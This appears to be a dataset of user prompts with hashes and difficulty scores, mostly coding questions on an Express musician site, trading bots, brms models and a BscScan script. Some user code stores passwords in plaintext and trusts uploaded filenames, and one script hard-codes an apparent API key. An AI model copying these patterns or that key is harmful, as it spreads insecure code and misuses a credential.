return {
name: musician.name,
genre: musician.genre,
originalName: musician.name,
profileLink: `/profile/${musician.id}`,
thumbnail: musician.thumbnail,
soundcloud: musician.soundcloud,
role: musician.role,
city: musician.city
};
});
let results = [];
if (query || role || city) {
const lowerQuery = query.toLowerCase();
results = musicians.filter(musician => {
const nameScore = musician.name.toLowerCase().startsWith(lowerQuery) ? 2 : musician.name.toLowerCase().includes(lowerQuery) ? 1 : 0;
const genreScore = musician.genre.toLowerCase().startsWith(lowerQuery) ? 2 : musician.genre.toLowerCase().includes(lowerQuery) ? 1 : 0;
return (
nameScore + genreScore > 0 &&
(role === "" || musician.role === role) &&
(city === "" || (musician.city && musician.city.toLowerCase().trim() === city.toLowerCase().trim()))
//(city === "" || musician.city.toLowerCase() === city.toLowerCase())
);
}).sort((a, b) => {
const aNameScore = a.name.toLowerCase().startsWith(lowerQuery) ? 2 : a.name.toLowerCase().includes(lowerQuery) ? 1 : 0;
const bNameScore = b.name.toLowerCase().startsWith(lowerQuery) ? 2 : b.name.toLowerCase().includes(lowerQuery) ? 1 : 0;
const aGenreScore = a.genre.toLowerCase().startsWith(lowerQuery) ? 2 : a.genre.toLowerCase().includes(lowerQuery) ? 1 : 0;
const bGenreScore = b.genre.toLowerCase().startsWith(lowerQuery) ? 2 : b.genre.toLowerCase().includes(lowerQuery) ? 1 : 0;
// Sort by name score, then genre score, then location score (descending)
if (aNameScore + aGenreScore + a.location < bNameScore + bGenreScore + b.location) {
return 1;
} else if (aNameScore + aGenreScore + a.location > bNameScore + bGenreScore + b.location) {
return -1;
} else {
return 0;
}
});
// Remove duplicates
results = results.filter((result, index, self) =>
index === self.findIndex(r => (
r.name === result.name && r.genre === result.genre && r.city === result.city
))
);
}
return results;
}
app.use((req, res, next) => {
if (req.session.musicianId) {
const musician = getMusicianById(req.session.musicianId);
res.locals.musician = musician;
res.locals.userLoggedIn = true;
res.locals.username = musician.name;
} else {
res.locals.userLoggedIn = false;
}
next();
});
app.get("/", (req, res) => {
const data = fs.readFileSync("./db/musicians.json");
const musicians = JSON.parse(data);
res.render("index", { musicians: musicians.musicians });
});
app.get("/autocomplete/cities", async (req, res) => {
const searchString = req.query.term;
connection.query(
"SELECT city FROM mytable WHERE city LIKE ?",
[searchString + '%'],
(error, results, fields) => {
if (error) {
console.error("Ошибка выполнения запроса: ", error);
res.status(500).send("Ошибка выполнения запроса");
} else {
const cities = results.map(row => row.city);
res.json(cities);
}
}
);
});
app.get("/register", (req, res) => {
if (req.session.musicianId) {
const musician = getMusicianById(req.session.musicianId);
res.redirect("/profile/" + musician.id);
} else {
res.render("register", { citiesAndRegions, city:'' });
}
});
app.post("/register", (req, res) => {
if (req.session.musicianId) {
const musician = getMusicianById(req.session.musicianId);
res.redirect("/profile/" + musician.id);
} else {
const data = fs.readFileSync("./db/musicians.json");
const musicians = JSON.parse(data);
const newMusician = {
id: musicians.musicians.length + 1,
name: req.body.name,
genre: req.body.genre,
instrument: req.body.instrument,
soundcloud: req.body.soundcloud,
password: req.body.password,
role: req.body.role,
city: req.body.city,
login: req.body.login
};
if (req.files && req.files.thumbnail) {
const file = req.files.thumbnail;
const filename = "musician_" + newMusician.id + "_" + file.name;
file.mv("./public/img/" + filename);
newMusician.thumbnail = filename;
}
const found = citiesAndRegions.find(
({ city }) => city === req.body.city.toLowerCase()
);
// Если найдено - сохраняем город и регион, если нет - оставляем только город
if (found) {
newMusician.city = found.city;
newMusician.region = found.region;
} else {
newMusician.city = req.body.city;
newMusician.region = "";
}
musicians.musicians.push(newMusician);
fs.writeFileSync("./db/musicians.json", JSON.stringify(musicians));
req.session.musicianId = newMusician.id;
res.redirect("/profile/" + newMusician.id);
}
});
app.get("/profile/:id", (req, res) => {
const musician = getMusicianById(parseInt(req.params.id));
if (musician) {
res.render("profile", { musician: musician });
} else {
res.status(404).send("Musician not found");
}
});
app.get("/login", (req, res) => {
res.render("login");
});
app.post("/login", (req, res) => {
const data = fs.readFileSync("./db/musicians.json");
const musicians = JSON.parse(data);
const musician = musicians.musicians.find(musician => musician.login === req.body.login && musician.password === req.body.password);
if (musician) {
req.session.musicianId = musician.id;
res.redirect("/profile/" + musician.id);
} else {
res.render("login", { error: "Invalid login or password" });
}
});
app.get("/logout", (req, res) => {
req.session.destroy();
res.redirect("/");
});
app.get('/search', (req, res) => {
const query = req.query.query || '';
const role = req.query.role || '';
const city = req.query.city || '';
let musicians = [];
if (query || role || city) {
musicians = search(query, role, city);
} else {
const data = fs.readFileSync('./db/musicians.json');
musicians = JSON.parse(data).musicians.map(musician => {
return {
name: musician.name,
genre: musician.genre,
originalName: musician.name,
profileLink: `/profile/${musician.id}`,
thumbnail: musician.thumbnail,
soundcloud: musician.soundcloud,
role: musician.role,
city: musician.city
};
});
}
res.locals.predefinedGenres = predefinedGenres;
app.locals.JSON = JSON;
res.render('search', { musicians, query, role, city, citiesAndRegions});
//res.redirect('/search');
});
app.get("/profile/:id/edit", requireLogin, (req, res) => {
const musician = getMusicianById(parseInt(req.params.id));
if (musician) {
if (req.session.musicianId === musician.id) { // Check if the logged-in user is the owner of the profile
res.render("edit-profile", { musician: musician });
} else {
res.status(403).send("Access denied");
}
} else {
res.status(404).send("Musician not found");
}
});
app.post('/profile/:id/edit', requireLogin, (req, res) => {
const musician = getMusicianById(parseInt(req.params.id));
if (musician) {
if (!req.body.name || !req.body.genre) {
res.status(400).send('Please fill out all fields');
} else {
musician.name = req.body.name;
musician.genre = req.body.genre;
musician.instrument = req.body.instrument;
musician.soundcloud = req.body.soundcloud;
musician.soundcloud1 = req.body.soundcloud1;
musician.soundcloud2 = req.body.soundcloud2;
musician.location = req.body.location;
musician.role = req.body.role;
musician.bio = req.body.bio;
if (req.files && req.files.thumbnail) {
const file = req.files.thumbnail;
const filename = 'musician_' + musician.id + '_' + file.name;
file.mv('./public/img/' + filename);
musician.thumbnail = filename;
}
const data = fs.readFileSync('./db/musicians.json');
const musicians = JSON.parse(data);
const index = musicians.musicians.findIndex(m => m.id === musician.id);
musicians.musicians[index] = musician;
fs.writeFileSync('./db/musicians.json', JSON.stringify(musicians));
res.redirect('/profile/' + musician.id);
}
} else {
res.status(404).send('Musician not found');
}
});
function isValidSoundCloudUrl(url) {
return url.startsWith('https://soundcloud.com/');
}
app.listen(3000, () => {
console.log("Server started on port 3000");
});
search.ejs:
<!DOCTYPE html>
<html>
<head>
<title>Search Musicians</title>
<link rel="stylesheet" href="/jquery-ui/themes/base/all.css" />
<script src="/jquery/dist/jquery.min.js"></script>
<script src="/jquery-ui/dist/jquery-ui.min.js"></script>
</head>
<body>
<h1>Search Musicians</h1>
<form action="/search" method="get">
<label for="query">Search by name or genre:</label> <input id="query" name="query" type="text" value="<%= query %>"><br>
<br>
<label for="role">Search by role:</label> <select id="role" name="role">
<option value="">
All
</option>
<option value="Band">
Band
</option>
<option value="Artist">
Artist
</option>
</select>
<label for="city">Search by location:</label>
<input id="city" name="city" type="text" autocomplete="on" value="<%= city %>" data-value="">
<br>
<!-- Add new input field for location -->
<br>
<br>
<button type="submit">Search</button>
</form><%if (musicians.length > 0) { %>
<h2>Results:</h2>
<ul>
<%musicians.forEach(musician => { %>
<li>
<a href="<%= musician.profileLink %>"><%= musician.name %> <%if (musician.thumbnail) { %> <img src="/img/<%= musician.thumbnail %>" alt="<%= musician.name %>"> <%} %></a> - <%= musician.genre %> - <%= musician.location %> <%if (musician.soundcloud) { %> <a href="%3C%=%20musician.soundcloud%20%%3E">SoundCloud</a> <%} %>
</li><%}); %>
</ul><%} else if (query || role) { %>
<p>No musicians found.</p><%} %>
<script>
$("#city").autocomplete({
source: '/autocomplete/cities',
minLength: 1,
});
const queryInput = document.querySelector("#query");
const roleInput = document.querySelector("#role");
const cityInput = document.querySelector("#city");
queryInput.value = "<%= query %>";
roleInput.value = "<%= role %>";
cityInput.value = cityInput.getAttribute('data-value');
const query = queryInput.value;
const role = roleInput.value;
const city = cityInput.value;
</script>
</body>
</html>
register.ejs (здесь надо реализовать автокомплит):
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta http-equiv="X-UA-Compatible" content="ie=edge" />
<link rel="stylesheet" href="/css/main.css" />
<link rel="stylesheet" href="/node_modules/jquery-ui/themes/base/all.css" />
<script src="/node_modules/jquery/dist/jquery.min.js"></script>
<script src="/node_modules/jquery-ui-dist/jquery-ui.min.js"></script>
<title>Register as a Musician</title>
</head>
<body>
<header>
<nav>
<ul>
<li><a href="/">Home</a></li>
<li><a href="/register">Register</a></li>
<li><a href="/search">Search</a></li>
</ul>
</nav>
</header>
<main>
<h1>Register as a Musician</h1>
<form method="post" enctype="multipart/form-data">
<label for="name">Name</label>
<input type="text" id="name" name="name" required>
<label for="role">Role</label>
<select id="role" name="role" required onchange="showInstrument(this.value)">
<option value="">Select a role</option>
<option value="Band">A band</option>
<option value="Artist">Artist</option>
</select>
<label for="genre">Genre</label>
<select id="genre" name="genre" required>
<option value="">Select a genre</option>
<option value="Rock">Rock</option>
<option value="Pop">Pop</option>
<option value="Hip hop">Hip hop</option>
<option value="Electronic">Electronic</option>
</select>
<label for="instrument" id="instrument-label" style="display: none">Instrument</label>
<select id="instrument" name="instrument" style="display: none">
<option value="">Select a instrument</option>
<option value="Bass">Bass</option>
<option value="Rythm guitar">Rythm guitar</option>
<option value="Lead guitar">Lead guitar</option>
<option value="Vocal">Vocal</option>
</select>
<label for="soundcloud">SoundCloud URL</label>
<input type="url" id="soundcloud" name="soundcloud">
<label for="password">Password</label>
<input type="password" id="password" name="password" required>
<label for="city">City:</label>
<input id="city" name="city" type="text" value="<%= citiesAndRegions[0].city %>"><br />
<label for="login">Login</label>
<input type="text" id="login" name="login" required>
<label for="thumbnail">Thumbnail</label>
<input type="file" id="thumbnail" name="thumbnail">
<button type="submit">Register</button>
</form>
</main>
<script>
function showInstrument(role) {
const instrumentLabel = document.querySelector('#instrument-label');
const instrumentSelect = document.querySelector('#instrument');
if (role === 'Artist') {
instrumentLabel.style.display = 'block';
instrumentSelect.style.display = 'block';
} else {
instrumentLabel.style.display = 'none';
instrumentSelect.style.display = 'none';
}
}
</script>
<script>
(function () {
const cities = <%= JSON.stringify(citiesAndRegions.map(item => item.city)) %>;
("#city").autocomplete({
source: cities,
minLength: 3,
});
});
</script>
</body>
</html>
|
13772928945483b2730c076607adeec4
|
{
"intermediate": 0.3877393305301666,
"beginner": 0.5134510397911072,
"expert": 0.09880967438220978
}
|
11,259
|
> subset_data$image
[1] "images/470_blur_80.jpg" "images/440_contrast_70.jpg" "images/382_contrast_90.jpg" "images/9_jpeg_80.jpg" "images/288_jpeg_80.jpg" "images/115_contrast_70.jpg" "images/113_contrast_70.jpg" "images/228_contrast_70.jpg" "images/180_contrast_90.jpg" "images/227_contrast_90.jpg"
[11] "images/467_blur_80.jpg" "images/100_jpeg_70.jpg" "images/147_contrast_70.jpg" "images/216_contrast_70.jpg" "images/469_jpeg_70.jpg" "images/277_contrast_90.jpg" "images/536_jpeg_70.jpg" "images/39_original.jpg" "images/65_jpeg_80.jpg" "images/396_jpeg_70.jpg"
[21] "images/475_jpeg_80.jpg" "images/345_blur_70.jpg" "images/51_blur_80.jpg" "images/226_blur_70.jpg" "images/233_jpeg_90.jpg" "images/177_blur_70.jpg" "images/10_jpeg_80.jpg" "images/149_blur_90.jpg" "images/328_blur_70.jpg" "images/190_contrast_90.jpg"
I have shown images either in their original state or with "jpeg", "blur" or "contrast" distortion. If the images are distorted the can be distorted at levels "70", "80 or "90" which represents how many percentage of the original quality they are expected to have (SSIM). How can I elegantly separate the image into its different category names using the image name? Also propose BRMS models to predict another variable called ratings from the nested combination of image distortions and levels. Here is a first attempt:
# Find distortions and categories
# Image number
subset_data$ImageNumber <- gsub("^\\D*([0-9]+)_.*$", "\\1", subset_data$image)
# Extract letters following the first underscore until a second underscore or ".jpg" is encountered
subset_data$distortion <- gsub("^[^_]+_(.*?)(_[^_]+\\.jpg|\\.jpg)$", "\\1", subset_data$image)
# Convert "original" to "none"
subset_data$distortion[subset_data$distortion == "original"] <- "none"
# Extract last set of digits immediately followed by ".jpg" for each filename
subset_data$level <- gsub(".*_([0-9]+)\\.jpg$", "\\1", subset_data$image)
# Convert cases that are not "70", "80", or "90" to "100"
subset_data$level[!subset_data$level %in% c("70", "80", "90")] <- "100"
# Factor variables
subset_data$distortion <- factor(subset_data$distortion, levels = c("none", "jpeg", "blur", "contrast"))
subset_data$level <- factor(subset_data$level, levels = c("100", "90", "80", "70"))
# BRMS model
model <- brm(ratings ~ distortion*level, data = subset_data, iter = 2000,
family = gaussian, chains = 4)
One issue with this attempt is that it assumes that all distortion * level options are possible, but none will always have a quality of 100. Also there may be options to harness that the level is ordered (100 best expected quality, 70 lowest) into the brms model.
|
32a54616ab3e97ee2bc3fd31bb32aaa5
|
{
"intermediate": 0.39085447788238525,
"beginner": 0.3523864448070526,
"expert": 0.25675901770591736
}
|
11,260
|
I used this code: import time
from binance.client import Client
from binance.enums import *
from binance.exceptions import BinanceAPIException
from binance.helpers import round_step_size
import pandas as pd
import json
import numpy as np
import pytz
import datetime as dt
import ccxt
from decimal import Decimal
import requests
import hmac
import hashlib
API_KEY = ''
API_SECRET = ''
STOP_LOSS_PERCENTAGE = -50
TAKE_PROFIT_PERCENTAGE = 100
MAX_TRADE_QUANTITY_PERCENTAGE = 100
POSITION_SIDE_SHORT = 'SELL'
POSITION_SIDE_LONG = 'BUY'
quantity = 1
symbol = 'BTC/USDT'
order_type = 'market'
leverage = 100
max_trade_quantity_percentage = 1
binance_futures = ccxt.binance({
'apiKey': API_KEY,
'secret': API_SECRET,
'enableRateLimit': True, # enable rate limitation
'options': {
'defaultType': 'future',
'adjustForTimeDifference': True
},'future': {
'sideEffectType': 'MARGIN_BUY', # MARGIN_BUY, AUTO_REPAY, etc…
}
})
client = Client(API_KEY, API_SECRET)
# Set the endpoint and parameters for the request
url = "https://fapi.binance.com/fapi/v2/account"
timestamp = int(time.time() * 1000)
recv_window = 5000
# Define the function to get the time difference between local and server time
# Define the function to get the server time
def get_server_time(exchange):
server_time = int(exchange.fetch_time()['timestamp'])
return server_time
# Define the function to get the time difference between local and server time
def get_time_difference():
server_time = get_server_time(binance_futures)
local_time = int(time.time() * 1000)
time_difference = local_time - server_time
return time_difference
# Set the endpoint and parameters for the request
url = "https://fapi.binance.com/fapi/v2/account"
timestamp = int(time.time() * 1000) - get_time_difference()
recv_window = 5000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
# Sign the message using the Client’s secret key
message = '&'.join([f"{k}={v}" for k, v in params.items()])
signature = hmac.new(API_SECRET.encode(), message.encode(), hashlib.sha256).hexdigest()
params['signature'] = signature
leverage = 100
# Send the request using the requests library
response = requests.get(url, params=params, headers={'X-MBX-APIKEY': API_KEY})
account_info = response.json()
# Get the USDT balance and calculate the max trade size based on the leverage
try:
usdt_balance = next((item for item in account_info['accountBalance'] if item["asset"] == "USDT"), {"free": 0})['free']
except KeyError:
usdt_balance = 0
print("Error: Could not retrieve USDT balance from API response.")
max_trade_size = float(usdt_balance) * leverage
# Get the current time and timestamp
now = dt.datetime.now()
date = now.strftime("%m/%d/%Y %H:%M:%S")
print(date)
timestamp = int(time.time() * 1000)
# Load the market symbols
try:
markets = binance_futures.load_markets()
except ccxt.BaseError as e:
print(f'Error fetching markets: {e}')
markets = []
if symbol in markets:
print(f"{symbol} found in the market")
else:
print(f"{symbol} not found in the market")
# Get server time and time difference
def get_server_time(exchange):
server_time = int(exchange.fetch_time()['timestamp'])
return server_time
def get_time_difference():
server_time = get_server_time(binance_futures)
local_time = int(time.time() * 1000)
time_difference = local_time - server_time
return time_difference
time.sleep(1)
def get_klines(symbol, interval, lookback):
url = "https://fapi.binance.com/fapi/v1/klines"
end_time = int(time.time() * 1000) # end time is now
start_time = end_time - (lookback * 60 * 1000) # start time is lookback minutes ago
symbol = symbol.replace("/", "") # remove slash from symbol
query_params = f"?symbol={symbol}&interval={interval}&startTime={start_time}&endTime={end_time}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
try:
response = requests.get(url + query_params, headers=headers)
response.raise_for_status()
data = response.json()
if not data: # if data is empty, return None
print('No data found for the given timeframe and symbol')
return None
ohlc = []
for d in data:
timestamp = dt.datetime.fromtimestamp(d[0]/1000).strftime('%Y-%m-%d %H:%M:%S')
ohlc.append({
'Open time': timestamp,
'Open': float(d[1]),
'High': float(d[2]),
'Low': float(d[3]),
'Close': float(d[4]),
'Volume': float(d[5])
})
df = pd.DataFrame(ohlc)
df.set_index('Open time', inplace=True)
return df
except requests.exceptions.RequestException as e:
print(f'Error in get_klines: {e}')
return None
df = get_klines(symbol, '15m', 66240)
def signal_generator(df):
if df is None:
return ""
open = df.Open.iloc[-1]
close = df.Close.iloc[-1]
previous_open = df.Open.iloc[-2]
previous_close = df.Close.iloc[-2]
# Bearish pattern
if (open>close and
previous_open<previous_close and
close<previous_open and
open>=previous_close):
return 'sell'
# Bullish pattern
elif (open<close and
previous_open>previous_close and
close>previous_open and
open<=previous_close):
return 'buy'
# No clear pattern
else:
return ""
df = get_klines(symbol, '15m', 66240)
def order_execution(symbol, signal, step_size, leverage, order_type):
# Set default value for response
response = {}
# Close any existing positions
current_position = None
positions = binance_futures.fapiPrivateGetPositionRisk()
for position in positions:
if position["symbol"] == symbol:
current_position = position
if current_position is not None and current_position["positionAmt"] != 0:
response = binance_futures.fapiPrivatePostOrder(
symbol=symbol,
side='SELL' if current_position['positionSide'] == 'LONG' else 'BUY',
type='MARKET',
quantity=abs(float(current_position['positionAmt'])),
positionSide=current_position['positionSide'],
reduceOnly=True
)
if 'orderId' in response:
print(f'Closed position: {response}')
else:
print(f'Error closing position: {response}')
time.sleep(1)
# Calculate appropriate order quantity and price based on signal
opposite_position = None
quantity = step_size
position_side = None #initialise to None
price = None
# Set default take profit price
take_profit_price = None
stop_loss_price = None
if signal == 'buy':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'SHORT' else None
order_type = 'TAKE_PROFIT_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'ask' in ticker:
price = ticker['ask']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
elif signal == 'sell':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'LONG' else None
order_type = 'STOP_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'bid' in ticker:
price = ticker['bid']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
# Set stop loss price
stop_loss_price = None
if price is not None:
price = round_step_size(price, step_size=step_size)
if signal == 'buy':
# Calculate take profit and stop loss prices for a buy signal
take_profit_price = round_step_size(price * (1 + TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 - STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
elif signal == 'sell':
# Calculate take profit and stop loss prices for a sell signal
take_profit_price = round_step_size(price * (1 - TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 + STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
# Adjust quantity if opposite position exists
if opposite_position is not None:
quantity = round_step_size(abs(float(opposite_position['positionAmt'])), step_size=step_size)
# Placing new order
api_method = 'fapiPrivatePostOrder'
params = {
'symbol': symbol,
'side': signal.upper(),
'type': order_type,
'quantity': quantity,
'positionSide': position_side,
'leverage': leverage,
'price': price,
'stopPrice': stop_loss_price,
'takeProfit': take_profit_price
}
response = getattr(binance_futures, api_method)(params=params)
if 'orderId' in response:
print(f'Order placed: {response}')
else:
print(f'Error placing order: {response}')
time.sleep(1)
return response
signal = signal_generator(df)
while True:
df = get_klines(symbol, '15m', 66240) # await the coroutine function here
if df is not None:
signal = signal_generator(df)
if signal is not None:
print(f"The signal time is: {dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}:{signal}")
time.sleep(0.1)
But I getting ERROR: File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 61, in <module>
timestamp = int(time.time() * 1000) - get_time_difference()
^^^^^^^^^^^^^^^^^^^^^
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 54, in get_time_difference
server_time = get_server_time(binance_futures)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 49, in get_server_time
server_time = int(exchange.fetch_time()['timestamp'])
~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^
TypeError: 'int' object is not subscriptable
|
7c2b23429c97aa345ecf1fdf77b4f951
|
{
"intermediate": 0.3417249619960785,
"beginner": 0.4113231599330902,
"expert": 0.2469518929719925
}
|
11,261
|
come up with 10 solutions written in rust. requirements: strictly using only std library when possible. task: make proc macro using proc-macro2 crate that get into argument type of $str intentionally erroneous expression containing syntax error, that may cause parse error and panic, but we should handle and avoid it by any means with our solution writing in code. initial code to elaborate: fn main { let erroneous_expr_str = "unimplemented(;"; tokens_from_str(erroneous_expr_str); } fn tokens_from_str(stream: &str) -> TokenStream { //... this needs to elaborate with code, that determines if the "stream" is erroneous, yet not falling in panic or any error, just return empty token stream if the "stream" is erroneous or return stream converted in token stream if the "stream" is not erroneous}. start with several most effective solutions, proceed through several sophisticated uncompromisingly solving the task to the several completely different approaches that might or might not ignoring the requirements
|
c5f2bf1d5fc168ccfb10dcef1efaa5c6
|
{
"intermediate": 0.603796660900116,
"beginner": 0.22858035564422607,
"expert": 0.16762299835681915
}
|
11,262
|
Loading Themes module
Could not load thumbnail file '/home/hp/.local/share/icons/Fluent/scalable/places/folder.svg': XML parse error: Error domain 1 code 4 on line 1 column 1 of data: Start tag expected, '<' not found
Traceback (most recent call last):
File "/usr/share/cinnamon/cinnamon-settings/cinnamon-settings.py", line 736, in button_press
self.side_view_nav(widget, None, category)
File "/usr/share/cinnamon/cinnamon-settings/cinnamon-settings.py", line 168, in side_view_nav
self.go_to_sidepage(sidePage, user_action=True)
File "/usr/share/cinnamon/cinnamon-settings/cinnamon-settings.py", line 177, in go_to_sidepage
sidePage.build()
File "/usr/share/cinnamon/cinnamon-settings/bin/SettingsWidgets.py", line 212, in build
self.module.on_module_selected()
File "/usr/share/cinnamon/cinnamon-settings/modules/cs_themes.py", line 162, in on_module_selected
self.refresh()
File "/usr/share/cinnamon/cinnamon-settings/modules/cs_themes.py", line 195, in refresh
self.refresh_chooser(payload)
File "/usr/share/cinnamon/cinnamon-settings/modules/cs_themes.py", line 253, in refresh_chooser
chooser.add_picture(theme_path, callback, title=theme, id=theme)
File "/usr/share/cinnamon/cinnamon-settings/bin/ChooserButtonWidgets.py", line 159, in add_picture
surface = self.create_scaled_surface(path)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/share/cinnamon/cinnamon-settings/bin/ChooserButtonWidgets.py", line 124, in create_scaled_surface
if pixbuf:
^^^^^^
UnboundLocalError: cannot access local variable 'pixbuf' where it is not associated with a value
I am trying to open the Themes setting on Cinimmon DE
|
db298aba15a87889f3ebe845059f61bb
|
{
"intermediate": 0.4709494709968567,
"beginner": 0.3396560549736023,
"expert": 0.18939454853534698
}
|
11,263
|
I have create LB service on azure aks, how can I put certificate on it?
|
cf64aeaaa319ab13e8f93d16ef45bfc1
|
{
"intermediate": 0.46961280703544617,
"beginner": 0.15827693045139313,
"expert": 0.3721103072166443
}
|
11,264
|
import yfinance as yf
import talib
import datetime
# Define the tickers for the stocks you want to get data for
tickers = [#tickers...]
al_tickers = [] # List to store tickers that meet the conditions
portfolio = {} # Dictionary to store the portfolio (stock: quantity)
# Set initial balance
balance = 10000
# Define the start and end dates for data retrieval
start_date = "2022-01-02"
end_date = datetime.date.today().strftime("%Y-%m-%d")
# Define the minimum investment amount
min_investment = 1000
# Iterate over each day from start_date to end_date
current_date = datetime.datetime.strptime(start_date, "%Y-%m-%d").date()
while current_date <= datetime.datetime.strptime(end_date, "%Y-%m-%d").date() and balance > 0:
for ticker in tickers:
try:
data = yf.download(ticker, start=current_date, end=current_date + datetime.timedelta(days=1), period="1d")
MA = talib.MA(data["Close"], timeperiod=200)
RSI = talib.RSI(data["Close"], timeperiod=14) # Calculate RSI with a time period of 14 days
# Calculate the percentage difference between the last closing price and MA
percentage_diff = ((data["Close"][-1] - MA[-1]) / MA[-1]) * 100
# Check the conditions for buying
if (
percentage_diff <= 5
and data["Close"][-1] > MA[-1]
and RSI[-1] > 60
and data["Close"][-1] >= min_investment
):
# Calculate the quantity to buy based on the available balance and stock price
quantity = min(int(balance * 0.1 / data["Close"][-1]), int(data["Close"][-1] / min_investment))
if quantity == 0:
continue # Skip the stock if the quantity is 0
# Buy the stock
portfolio[(ticker, current_date)] = quantity
balance -= quantity * data["Close"][-1]
except Exception as e:
print(f"Error occurred for {ticker} on {current_date}: {str(e)}")
continue # Continue the loop even if an error occurs for a particular stock
# Check the conditions for selling
for (stock, buy_date), quantity in portfolio.items():
try:
data = yf.download(stock[0], start=current_date, end=current_date + datetime.timedelta(days=1), period="1d")
if (
data["Close"][-1] < MA[-1]
or RSI[-1] < 40
or data["Close"][-1] <= min_investment
):
# Sell the stock
balance += quantity * data["Close"][-1]
del portfolio[(stock, buy_date)]
except Exception as e:
print(f"Error occurred for {stock} on {current_date}: {str(e)}")
continue # Continue the loop even if an error occurs for a particular stock
current_date += datetime.timedelta(days=1)
# Print the final portfolio and balance
print("Final Portfolio:")
for (stock, buy_date), quantity in portfolio.items():
print(f"{stock} - Bought on {buy_date} - Quantity: {quantity}")
print(f"Final Balance: {balance}")
|
6828d7b733f596840bece5f7868cb70a
|
{
"intermediate": 0.3248741328716278,
"beginner": 0.45729950070381165,
"expert": 0.2178264707326889
}
|
11,265
|
how to create a hive table from csv file
|
de648afc23173aebe216b66ce6b92a58
|
{
"intermediate": 0.2925807237625122,
"beginner": 0.19258488714694977,
"expert": 0.5148343443870544
}
|
11,267
|
write simple javascript html css modal window
|
7b3c81113b6dd00c5052d7cd34f63c92
|
{
"intermediate": 0.4039138853549957,
"beginner": 0.35811030864715576,
"expert": 0.23797589540481567
}
|
11,268
|
how to realize communicaton between qemu vm instances
|
45c43f8f518d2b9a19eec4bcd66ace58
|
{
"intermediate": 0.26304376125335693,
"beginner": 0.27311012148857117,
"expert": 0.46384620666503906
}
|
11,269
|
以下是用C语言实现的代码,可以实现逻辑表达式的真值表输出:\n\n
|
3f4b257b86dee18fa8cbc3aac2db6090
|
{
"intermediate": 0.3284284770488739,
"beginner": 0.3136495351791382,
"expert": 0.3579219579696655
}
|
11,270
|
Мне нужно сделать запросы к базе данных. Мой запрос,выполненный во flask,выглядит так res = db.session.query(Order_tasks.name_of_order,
Order_tasks.id,
Topics.name,
func.count(Tasks.id),
Order_tasks.data). \
join(Users_orders, Order_tasks.id == Users_orders.orders_task_id). \
join(Users,Users_orders.users_id == Users.id). \
join(Order_tasks.tasks).join(Tasks.topics). \
order_by(Order_tasks.id.desc()). \
group_by(Order_tasks.name_of_order,
Order_tasks.id,Topics.name). \
distinct().filter(Users.id==self.id)
res_pages = 0
if page_filter==None:
page_filter=1
if per_page_filter==None:
per_page_filter=10
res = res.paginate(int(page_filter),int(per_page_filter), False)
res_pages = res.pages
res = res.items
result = [{'name': res[0][0], "id": res[0][1], 'topics': [res[0][2]], 'count': res[0][3], 'Date_time': res[0][4]}]
for tup in res:
if tup[1]==result[-1]['id']:
result[-1]['topics'].append(tup[2])
result[-1]['count'] += int(tup[3])
else:
new_dict = {'name': tup[0], "id": tup[1], 'topics': [tup[2]], 'count': tup[3], 'Date_time': tup[4]}
result.append(new_dict)
return result, res_pages Его проблема состоит в том, что он возвращает намного меньше 10. Как это можно исправить?
|
a32c25cb3e98d06fe7c7c1abdcf275c7
|
{
"intermediate": 0.32994070649147034,
"beginner": 0.4806901216506958,
"expert": 0.18936920166015625
}
|
11,271
|
# Оптимизированный!!! Возвращает адреса созданных токенов из новых блоков в реальном времени
import asyncio
import aiohttp
import time
bscscan_api_key = 'CXTB4IUT31N836G93ZI3YQBEWBQEGGH5QS'
# Create a semaphore with a limit of 3
semaphore = asyncio.Semaphore(1)
async def get_latest_block_number():
async with aiohttp.ClientSession() as session:
url = f'https://api.bscscan.com/api?module=proxy&action=eth_blockNumber&apikey={bscscan_api_key}'
async with session.get(url) as response:
data = await response.json()
return int(data['result'], 16)
async def get_external_transactions(block_number):
async with semaphore:
async with aiohttp.ClientSession() as session:
url = f'https://api.bscscan.com/api?module=proxy&action=eth_getBlockByNumber&tag={block_number}&boolean=true&apikey={bscscan_api_key}'
try:
async with session.get(url) as response:
data = await response.json()
except Exception as e:
print(f'Error in API request: {e}')
return []
if data['result'] is None or isinstance(data['result'], str):
print(f"Error: Cannot find the block")
return []
return data['result'].get('transactions', [])
async def get_contract_address(tx_hash):
async with semaphore:
async with aiohttp.ClientSession() as session:
url = f'https://api.bscscan.com/api?module=proxy&action=eth_getTransactionReceipt&txhash={tx_hash}&apikey={bscscan_api_key}'
try:
async with session.get(url) as response:
data = await response.json()
except Exception as e:
print(f'Error in API request: {e}')
return None
if data['result'] is None or not isinstance(data['result'], dict):
print(f"Error: Cannot find the address")
return None
return data['result'].get('contractAddress')
